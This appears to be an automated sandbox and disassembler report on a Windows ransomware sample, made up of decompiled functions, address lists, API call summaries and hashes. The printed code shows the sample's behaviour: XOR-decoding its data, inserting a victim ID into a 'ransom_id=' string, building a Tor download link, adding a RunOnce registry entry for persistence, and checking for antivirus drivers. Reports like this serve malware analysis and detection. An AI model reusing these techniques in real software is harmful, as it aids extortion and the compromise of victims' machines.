                                    					_v176 = 0x6c006d;
                                    					_v172 = 0x65002e;
                                    					_v168 = 0x6e;
                                    					if( *0xf592a44 == 0) {
                                    						_t65 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                    						 *0xf592a44 = _t65;
                                    						if(_t65 != 0) {
                                    							wsprintfW(_t65, L"%s",  &_v280);
                                    						}
                                    					}
                                    					VirtualFree(_v160, 0, 0x8000); // executed
                                    					_t54 = E0F587D70( &_v152);
                                    					goto L24;
                                    				}
                                    				while(1) {
                                    					L11:
                                    					lstrcpyW(_t94, _t100);
                                    					_t94[lstrlenW(_t94)] = 0x20;
                                    					_t94 = 0xf592000;
                                    					_t69 =  *0xf592000; // 0xfeff
                                    					if(_t69 == 0) {
                                    						goto L20;
                                    					}
                                    					_t82 = _t69 & 0x0000ffff;
                                    					_t102 = 0xf592000 - L"{USERID}";
                                    					do {
                                    						_t70 = L"{USERID}";
                                    						if(_t82 == 0) {
                                    							goto L19;
                                    						}
                                    						while(1) {
                                    							_t83 =  *_t70 & 0x0000ffff;
                                    							if(_t83 == 0) {
                                    								break;
                                    							}
                                    							_t90 = ( *(_t102 + _t70) & 0x0000ffff) - _t83;
                                    							if(_t90 != 0) {
                                    								L18:
                                    								if( *_t70 == 0) {
                                    									break;
                                    								}
                                    								goto L19;
                                    							}
                                    							_t70 =  &(_t70[1]);
                                    							if( *(_t102 + _t70) != _t90) {
                                    								continue;
                                    							}
                                    							goto L18;
                                    						}
                                    						_t100 = _v156;
                                    						goto L11;
                                    						L19:
                                    						_t20 =  &(_t94[1]); // 0x2d002d
                                    						_t82 =  *_t20 & 0x0000ffff;
                                    						_t94 =  &(_t94[1]);
                                    						_t102 = _t102 + 2;
                                    					} while (_t82 != 0);
                                    					goto L20;
                                    				}
                                    				goto L20;
                                    			}























































                                    0x0f5842c5
                                    0x0f584598
                                    0x0f58459d
                                    0x0f58459d
                                    0x0f5842cb
                                    0x0f5842cc
                                    0x0f5842ce
                                    0x0f5842cf
                                    0x0f5842d4
                                    0x0f5842d6
                                    0x0f5842d7
                                    0x0f5842d9
                                    0x0f5842da
                                    0x0f5842dc
                                    0x0f5842dd
                                    0x0f5842df
                                    0x0f5842e0
                                    0x0f5842e5
                                    0x0f5842e7
                                    0x0f5842e8
                                    0x0f5842f1
                                    0x0f5842fd
                                    0x0f58430e
                                    0x0f584317
                                    0x0f584321
                                    0x0f584327
                                    0x0f584330
                                    0x0f584341
                                    0x0f58433d
                                    0x0f58433d
                                    0x0f58433d
                                    0x0f58434b
                                    0x0f584357
                                    0x0f584363
                                    0x0f584369
                                    0x0f584371
                                    0x0f584376
                                    0x0f58437b
                                    0x0f58437e
                                    0x0f584383
                                    0x0f584390
                                    0x0f584390
                                    0x0f584390
                                    0x0f584393
                                    0x0f584398
                                    0x0f58439c
                                    0x0f5843a1
                                    0x0f5843a1
                                    0x0f5843b0
                                    0x0f5843b0
                                    0x0f5843b7
                                    0x0f5843b8
                                    0x0f5843c4
                                    0x0f5843d8
                                    0x0f5843dc
                                    0x0f584456
                                    0x0f58445d
                                    0x0f584465
                                    0x0f58446d
                                    0x0f584475
                                    0x0f58447d
                                    0x0f584485
                                    0x0f58448d
                                    0x0f584495
                                    0x0f58449d
                                    0x0f5844a5
                                    0x0f5844ad
                                    0x0f5844b5
                                    0x0f5844bd
                                    0x0f5844c5
                                    0x0f5844cd
                                    0x0f5844d5
                                    0x0f5844dd
                                    0x0f5844e5
                                    0x0f5844ed
                                    0x0f5844f5
                                    0x0f5844fd
                                    0x0f584505
                                    0x0f58450d
                                    0x0f584515
                                    0x0f58451d
                                    0x0f584525
                                    0x0f58452d
                                    0x0f584535
                                    0x0f58453d
                                    0x0f584545
                                    0x0f584555
                                    0x0f58455b
                                    0x0f584562
                                    0x0f58456f
                                    0x0f584575
                                    0x0f584562
                                    0x0f584586
                                    0x0f584593
                                    0x00000000
                                    0x0f584593
                                    0x0f5843e0
                                    0x0f5843e0
                                    0x0f5843e2
                                    0x0f5843f4
                                    0x0f5843f8
                                    0x0f5843fd
                                    0x0f584406
                                    0x00000000
                                    0x00000000
                                    0x0f58440a
                                    0x0f58440d
                                    0x0f584413
                                    0x0f584413
                                    0x0f58441b
                                    0x00000000
                                    0x00000000
                                    0x0f584420
                                    0x0f584420
                                    0x0f584426
                                    0x00000000
                                    0x00000000
                                    0x0f584430
                                    0x0f584432
                                    0x0f58443d
                                    0x0f584441
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f584441
                                    0x0f584434
                                    0x0f58443b
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f58443b
                                    0x0f58459e
                                    0x00000000
                                    0x0f584447
                                    0x0f584447
                                    0x0f584447
                                    0x0f58444b
                                    0x0f58444e
                                    0x0f584451
                                    0x00000000
                                    0x0f584413
                                    0x00000000

                                    APIs
                                      • Part of subcall function 0F583BC0: GetProcessHeap.KERNEL32(?,?,0F584807,00000000,?,00000000,00000000), ref: 0F583C5C
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F5874B7
                                      • Part of subcall function 0F587490: GetUserNameW.ADVAPI32 ref: 0F5874C8
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F5874E6
                                      • Part of subcall function 0F587490: GetComputerNameW.KERNEL32 ref: 0F5874F0
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F587510
                                      • Part of subcall function 0F587490: wsprintfW.USER32 ref: 0F587551
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F58756E
                                      • Part of subcall function 0F587490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F587592
                                      • Part of subcall function 0F587490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F584810,?), ref: 0F5875B6
                                      • Part of subcall function 0F587490: RegCloseKey.KERNEL32(00000000), ref: 0F5875D2
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872F2
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872FD
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587313
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58731E
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587334
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58733F
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587355
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(0F584B36,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587360
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587376
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587381
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587397
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873A2
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873C1
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873CC
                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584321
                                    • lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584363
                                    • lstrcpyW.KERNEL32 ref: 0F5843E2
                                    • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F5843E9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
                                    • String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$ransom_id=$s$t$t$w$w$w$y${USERID}
                                    • API String ID: 4100118565-2385900546
                                    • Opcode ID: 432544a892d25b4be73940f56c19447610758be2069dd28a78988cd64a069953
                                    • Instruction ID: 915bb084315fbe07fc589522136c87c40f4af6723162c7fd71625b339812ff7c
                                    • Opcode Fuzzy Hash: 432544a892d25b4be73940f56c19447610758be2069dd28a78988cd64a069953
                                    • Instruction Fuzzy Hash: 4B710470504341DBE724EF10D80976B7FE1FB80758F50492CFA856B2A2EBF9954ACB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 237 f5843a6-f5843ad 238 f5843b0-f5843bd 237->238 238->238 239 f5843bf-f5843dc call f5881f0 238->239 242 f5843de 239->242 243 f584456-f584545 239->243 246 f5843e0-f584406 lstrcpyW lstrlenW 242->246 244 f584578-f58459d VirtualFree call f587d70 243->244 245 f584547-f584562 VirtualAlloc 243->245 245->244 247 f584564-f584575 wsprintfW 245->247 246->243 249 f584408-f58440d 246->249 247->244 251 f584413-f58441b 249->251 252 f58441d 251->252 253 f584447-f584454 251->253 254 f584420-f584426 252->254 253->243 253->251 255 f58442c-f584432 254->255 256 f58459e-f5845a5 254->256 257 f58443d-f584441 255->257 258 f584434-f58443b 255->258 256->246 257->253 257->256 258->254 258->257
                                    C-Code - Quality: 100%
                                    			E0F5843A6(void* __eax, void* __ebp, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, void* _a128, WCHAR* _a132, char _a136) {
                                    				void* _t41;
                                    				void* _t44;
                                    				WCHAR* _t45;
                                    				signed short _t49;
                                    				signed short* _t50;
                                    				signed int _t55;
                                    				signed int _t56;
                                    				void* _t59;
                                    				WCHAR* _t60;
                                    				WCHAR* _t62;
                                    				void* _t65;
                                    
                                    				_t41 = __eax;
                                    				do {
                                    					 *(_t41 + 0xf592000) =  *(_t41 + 0xf592000) ^ 0x00000005;
                                    					_t41 = _t41 + 1;
                                    				} while (_t41 < 0xa38);
                                    				 *0xf592a64 = 0xf592000;
                                    				_t60 = E0F5881F0(0xf592000, L"{USERID}");
                                    				if(_t60 != 0) {
                                    					while(1) {
                                    						L4:
                                    						lstrcpyW(_t60, _t62);
                                    						_t60[lstrlenW(_t60)] = 0x20;
                                    						_t60 = 0xf592000;
                                    						_t49 =  *0xf592000; // 0xfeff
                                    						if(_t49 == 0) {
                                    							goto L13;
                                    						}
                                    						_t55 = _t49 & 0x0000ffff;
                                    						_t65 = 0xf592000 - L"{USERID}";
                                    						do {
                                    							_t50 = L"{USERID}";
                                    							if(_t55 == 0) {
                                    								goto L12;
                                    							} else {
                                    								while(1) {
                                    									_t56 =  *_t50 & 0x0000ffff;
                                    									if(_t56 == 0) {
                                    										break;
                                    									}
                                    									_t59 = ( *(_t65 + _t50) & 0x0000ffff) - _t56;
                                    									if(_t59 != 0) {
                                    										L11:
                                    										if( *_t50 == 0) {
                                    											break;
                                    										} else {
                                    											goto L12;
                                    										}
                                    									} else {
                                    										_t50 =  &(_t50[1]);
                                    										if( *(_t65 + _t50) != _t59) {
                                    											continue;
                                    										} else {
                                    											goto L11;
                                    										}
                                    									}
                                    									goto L13;
                                    								}
                                    								_t62 = _a132;
                                    								goto L4;
                                    							}
                                    							goto L13;
                                    							L12:
                                    							_t7 =  &(_t60[1]); // 0x2d002d
                                    							_t55 =  *_t7 & 0x0000ffff;
                                    							_t60 =  &(_t60[1]);
                                    							_t65 = _t65 + 2;
                                    						} while (_t55 != 0);
                                    						goto L13;
                                    					}
                                    				}
                                    				L13:
                                    				_a8 = 0x740068;
                                    				_a12 = 0x700074;
                                    				_a16 = 0x3a0073;
                                    				_a20 = 0x2f002f;
                                    				_a24 = 0x770077;
                                    				_a28 = 0x2e0077;
                                    				_a32 = 0x6f0074;
                                    				_a36 = 0x700072;
                                    				_a40 = 0x6f0072;
                                    				_a44 = 0x65006a;
                                    				_a48 = 0x740063;
                                    				_a52 = 0x6f002e;
                                    				_a56 = 0x670072;
                                    				_a60 = 0x64002f;
                                    				_a64 = 0x77006f;
                                    				_a68 = 0x6c006e;
                                    				_a72 = 0x61006f;
                                    				_a76 = 0x2f0064;
                                    				_a80 = 0x6f0064;
                                    				_a84 = 0x6e0077;
                                    				_a88 = 0x6f006c;
                                    				_a92 = 0x640061;
                                    				_a96 = 0x65002d;
                                    				_a100 = 0x730061;
                                    				_a104 = 0x2e0079;
                                    				_a108 = 0x740068;
                                    				_a112 = 0x6c006d;
                                    				_a116 = 0x65002e;
                                    				_a120 = 0x6e;
                                    				if( *0xf592a44 == 0) {
                                    					_t45 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                    					 *0xf592a44 = _t45;
                                    					if(_t45 != 0) {
                                    						wsprintfW(_t45, L"%s",  &_a8);
                                    					}
                                    				}
                                    				VirtualFree(_a128, 0, 0x8000); // executed
                                    				_t44 = E0F587D70( &_a136);
                                    				return _t44;
                                    			}














                                    0x0f5843a6
                                    0x0f5843b0
                                    0x0f5843b0
                                    0x0f5843b7
                                    0x0f5843b8
                                    0x0f5843c4
                                    0x0f5843d8
                                    0x0f5843dc
                                    0x0f5843e0
                                    0x0f5843e0
                                    0x0f5843e2
                                    0x0f5843f4
                                    0x0f5843f8
                                    0x0f5843fd
                                    0x0f584406
                                    0x00000000
                                    0x00000000
                                    0x0f58440a
                                    0x0f58440d
                                    0x0f584413
                                    0x0f584413
                                    0x0f58441b
                                    0x00000000
                                    0x0f584420
                                    0x0f584420
                                    0x0f584420
                                    0x0f584426
                                    0x00000000
                                    0x00000000
                                    0x0f584430
                                    0x0f584432
                                    0x0f58443d
                                    0x0f584441
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f584434
                                    0x0f584434
                                    0x0f58443b
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f58443b
                                    0x00000000
                                    0x0f584432
                                    0x0f58459e
                                    0x00000000
                                    0x0f58459e
                                    0x00000000
                                    0x0f584447
                                    0x0f584447
                                    0x0f584447
                                    0x0f58444b
                                    0x0f58444e
                                    0x0f584451
                                    0x00000000
                                    0x0f584413
                                    0x0f5843e0
                                    0x0f584456
                                    0x0f58445d
                                    0x0f584465
                                    0x0f58446d
                                    0x0f584475
                                    0x0f58447d
                                    0x0f584485
                                    0x0f58448d
                                    0x0f584495
                                    0x0f58449d
                                    0x0f5844a5
                                    0x0f5844ad
                                    0x0f5844b5
                                    0x0f5844bd
                                    0x0f5844c5
                                    0x0f5844cd
                                    0x0f5844d5
                                    0x0f5844dd
                                    0x0f5844e5
                                    0x0f5844ed
                                    0x0f5844f5
                                    0x0f5844fd
                                    0x0f584505
                                    0x0f58450d
                                    0x0f584515
                                    0x0f58451d
                                    0x0f584525
                                    0x0f58452d
                                    0x0f584535
                                    0x0f58453d
                                    0x0f584545
                                    0x0f584555
                                    0x0f58455b
                                    0x0f584562
                                    0x0f58456f
                                    0x0f584575
                                    0x0f584562
                                    0x0f584586
                                    0x0f584593
                                    0x0f58459d

                                    APIs
                                    • lstrcpyW.KERNEL32 ref: 0F5843E2
                                    • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F5843E9
                                    • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F584555
                                    • wsprintfW.USER32 ref: 0F58456F
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0F584586
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
                                    • String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$s$t$t$w$w$w$y${USERID}
                                    • API String ID: 4033391921-3341315666
                                    • Opcode ID: cd9fbc8736e4a6bb610ac8dcb7ce18b7454ce6593b025f8965148a857e689544
                                    • Instruction ID: 0d40faeccb505d06215e6cf63961f3fbd80ded84db50686b87d8619f31c442a3
                                    • Opcode Fuzzy Hash: cd9fbc8736e4a6bb610ac8dcb7ce18b7454ce6593b025f8965148a857e689544
                                    • Instruction Fuzzy Hash: B441A270509341DBD724EF10D54832ABFE2FB80759F50492CFA886B262D7FA859ACF52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    C-Code - Quality: 94%
                                    			E0F582960(WCHAR* __ecx, void* __eflags) {
                                    				void* _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				intOrPtr _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				short _v32;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				intOrPtr _v64;
                                    				intOrPtr _v68;
                                    				intOrPtr _v72;
                                    				intOrPtr _v76;
                                    				intOrPtr _v80;
                                    				intOrPtr _v84;
                                    				intOrPtr _v88;
                                    				intOrPtr _v92;
                                    				intOrPtr _v96;
                                    				intOrPtr _v100;
                                    				intOrPtr _v104;
                                    				intOrPtr _v108;
                                    				intOrPtr _v112;
                                    				intOrPtr _v116;
                                    				intOrPtr _v120;
                                    				intOrPtr _v124;
                                    				intOrPtr _v128;
                                    				intOrPtr _v132;
                                    				intOrPtr _v136;
                                    				short _v140;
                                    				long _t45;
                                    				WCHAR* _t58;
                                    
                                    				_t58 = __ecx;
                                    				_v32 = 0x520050;
                                    				_v28 = 0x440049;
                                    				_push(0x41);
                                    				_v24 = 0x520055;
                                    				_v20 = 0x530041;
                                    				_v16 = 0x4b0048;
                                    				_v12 = 0x41;
                                    				E0F5882B0( &_v32, lstrlenW( &_v32)); // executed
                                    				_v140 = 0x4f0053;
                                    				_v136 = 0x540046;
                                    				_v132 = 0x410057;
                                    				_v128 = 0x450052;
                                    				_v124 = 0x4d005c;
                                    				_v120 = 0x630069;
                                    				_v116 = 0x6f0072;
                                    				_v112 = 0x6f0073;
                                    				_v108 = 0x740066;
                                    				_v104 = 0x57005c;
                                    				_v100 = 0x6e0069;
                                    				_v96 = 0x6f0064;
                                    				_v92 = 0x730077;
                                    				_v88 = 0x43005c;
                                    				_v84 = 0x720075;
                                    				_v80 = 0x650072;
                                    				_v76 = 0x74006e;
                                    				_v72 = 0x650056;
                                    				_v68 = 0x730072;
                                    				_v64 = 0x6f0069;
                                    				_v60 = 0x5c006e;
                                    				_v56 = 0x750052;
                                    				_v52 = 0x4f006e;
                                    				_v48 = 0x63006e;
                                    				_v44 = 0x65;
                                    				_t45 = RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0); // executed
                                    				if(_t45 != 0) {
                                    					return 0;
                                    				} else {
                                    					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47); // executed
                                    					asm("sbb esi, esi"); // executed
                                    					RegCloseKey(_v8);
                                    					_t39 =  &(_t58[0]); // 0x1
                                    					return _t39;
                                    				}
                                    			}





































                                    0x0f58296b
                                    0x0f58296d
                                    0x0f582979
                                    0x0f582980
                                    0x0f582984
                                    0x0f58298c
                                    0x0f582993
                                    0x0f58299a
                                    0x0f5829a8
                                    0x0f5829b0
                                    0x0f5829bd
                                    0x0f5829c7
                                    0x0f5829ce
                                    0x0f5829eb
                                    0x0f5829f8
                                    0x0f5829ff
                                    0x0f582a06
                                    0x0f582a0d
                                    0x0f582a14
                                    0x0f582a1b
                                    0x0f582a22
                                    0x0f582a29
                                    0x0f582a30
                                    0x0f582a37
                                    0x0f582a3e
                                    0x0f582a45
                                    0x0f582a4c
                                    0x0f582a53
                                    0x0f582a5a
                                    0x0f582a61
                                    0x0f582a68
                                    0x0f582a6f
                                    0x0f582a76
                                    0x0f582a7d
                                    0x0f582a84
                                    0x0f582a8c
                                    0x0f582ac7
                                    0x0f582a8e
                                    0x0f582aa4
                                    0x0f582aaf
                                    0x0f582ab1
                                    0x0f582ab7
                                    0x0f582abf
                                    0x0f582abf

                                    APIs
                                    • lstrlenW.KERNEL32(00520050,00000041,772D82B0,00000000), ref: 0F58299D
                                      • Part of subcall function 0F5882B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F5882CD
                                      • Part of subcall function 0F5882B0: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F5882FB
                                      • Part of subcall function 0F5882B0: GetModuleHandleA.KERNEL32(?), ref: 0F58834F
                                      • Part of subcall function 0F5882B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F58835D
                                      • Part of subcall function 0F5882B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F58836C
                                      • Part of subcall function 0F5882B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5883B5
                                      • Part of subcall function 0F5882B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F5883C3
                                    • RegCreateKeyExW.KERNEL32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,0F582C45,00000000), ref: 0F582A84
                                    • lstrlenW.KERNEL32(00000000), ref: 0F582A8F
                                    • RegSetValueExW.KERNEL32(0F582C45,00520050,00000000,00000001,00000000,00000000), ref: 0F582AA4
                                    • RegCloseKey.KERNEL32(0F582C45), ref: 0F582AB1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
                                    • String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
                                    • API String ID: 553367697-3791882466
                                    • Opcode ID: 3b3f2971afce78b4317862d047c3f8e00acbc6d995383461f027ecabc2b9d2fb
                                    • Instruction ID: 078393bbf2970ad8433ee405127a8ced7b1603c5e7f52df8b3d54107fc9dd902
                                    • Opcode Fuzzy Hash: 3b3f2971afce78b4317862d047c3f8e00acbc6d995383461f027ecabc2b9d2fb
                                    • Instruction Fuzzy Hash: DA31D9B090021DEFEB20CF91E948BEDBFB9FB01709F508119D6187A281D7BA49499F95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    C-Code - Quality: 85%
                                    			E0F582D30() {
                                    				struct _WNDCLASSEXW _v52;
                                    				struct tagMSG _v84;
                                    				intOrPtr _v88;
                                    				intOrPtr _v92;
                                    				char _v96;
                                    				void* _t37;
                                    				short _t42;
                                    				void* _t49;
                                    				void* _t59;
                                    				void* _t60;
                                    				void* _t61;
                                    				void* _t62;
                                    				void* _t67;
                                    				void* _t69;
                                    				long _t71;
                                    
                                    				_push(_t62);
                                    				_push(_t69);
                                    				_v84.message = 0x6c006b;
                                    				_push(_t67);
                                    				_v84.wParam = 0x660069;
                                    				_v84.lParam = 0x73002e;
                                    				_v84.time = 0x730079;
                                    				_v84.pt = 0;
                                    				_v96 = 0x6c006b;
                                    				_v92 = 0x2e0031;
                                    				_v88 = 0x790073;
                                    				_v84.hwnd = 0x73;
                                    				_t37 = E0F582F50( &(_v84.message)); // executed
                                    				if(_t37 != 0) {
                                    					L5:
                                    					_v52.cbSize = 0x30;
                                    					_v52.style = 3;
                                    					_v52.lpfnWndProc = E0F582C50;
                                    					_v52.cbClsExtra = 0;
                                    					_v52.cbWndExtra = 0;
                                    					_v52.hInstance = GetModuleHandleW(0);
                                    					_v52.hIcon = 0;
                                    					_v52.hCursor = LoadCursorW(0, 0x7f00);
                                    					_v52.hbrBackground = 6;
                                    					_v52.lpszMenuName = 0;
                                    					_v52.lpszClassName = L"win32app";
                                    					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
                                    					_t42 = RegisterClassExW( &_v52);
                                    					_push(0);
                                    					if(_t42 != 0) {
                                    						GetModuleHandleW();
                                    						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
                                    						SetWindowLongW(_t71, 0xfffffff0, 0);
                                    						if(_t71 != 0) {
                                    							ShowWindow(_t71, 5);
                                    							UpdateWindow(_t71);
                                    							_t49 = CreateThread(0, 0, E0F582D10, _t71, 0, 0);
                                    							if(_t49 != 0) {
                                    								CloseHandle(_t49);
                                    							}
                                    							if(GetMessageW( &_v84, 0, 0, 0) == 0) {
                                    								L15:
                                    								ExitThread(0);
                                    							} else {
                                    								do {
                                    									TranslateMessage( &_v84);
                                    								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
                                    								goto L15;
                                    							}
                                    						}
                                    						ExitThread(_t71);
                                    					}
                                    					ExitThread();
                                    				}
                                    				_t59 = E0F582F50( &_v96); // executed
                                    				if(_t59 != 0) {
                                    					goto L5;
                                    				}
                                    				_v84.message = 0x730066;
                                    				_v84.wParam = 0x660064;
                                    				_v84.lParam = 0x2e0077;
                                    				_v84.time = 0x790073;
                                    				_v84.pt = 0x73;
                                    				_t60 = E0F582F50( &(_v84.message)); // executed
                                    				if(_t60 != 0) {
                                    					goto L15;
                                    				}
                                    				_t61 = E0F5830A0(_t62, _t67, _t69); // executed
                                    				if(_t61 != 0) {
                                    					goto L15;
                                    				}
                                    				_push(_t61); // executed
                                    				E0F582AD0(); // executed
                                    				goto L5;
                                    			}


















                                    0x0f582d39
                                    0x0f582d3a
                                    0x0f582d3d
                                    0x0f582d45
                                    0x0f582d4a
                                    0x0f582d52
                                    0x0f582d5a
                                    0x0f582d62
                                    0x0f582d67
                                    0x0f582d6f
                                    0x0f582d77
                                    0x0f582d7f
                                    0x0f582d87
                                    0x0f582d8e
                                    0x0f582de9
                                    0x0f582df1
                                    0x0f582df9
                                    0x0f582e01
                                    0x0f582e09
                                    0x0f582e11
                                    0x0f582e22
                                    0x0f582e26
                                    0x0f582e3d
                                    0x0f582e41
                                    0x0f582e49
                                    0x0f582e51
                                    0x0f582e5f
                                    0x0f582e68
                                    0x0f582e6e
                                    0x0f582e73
                                    0x0f582e7b
                                    0x0f582eaf
                                    0x0f582eb4
                                    0x0f582ebc
                                    0x0f582ec8
                                    0x0f582ecf
                                    0x0f582ee3
                                    0x0f582eeb
                                    0x0f582eee
                                    0x0f582eee
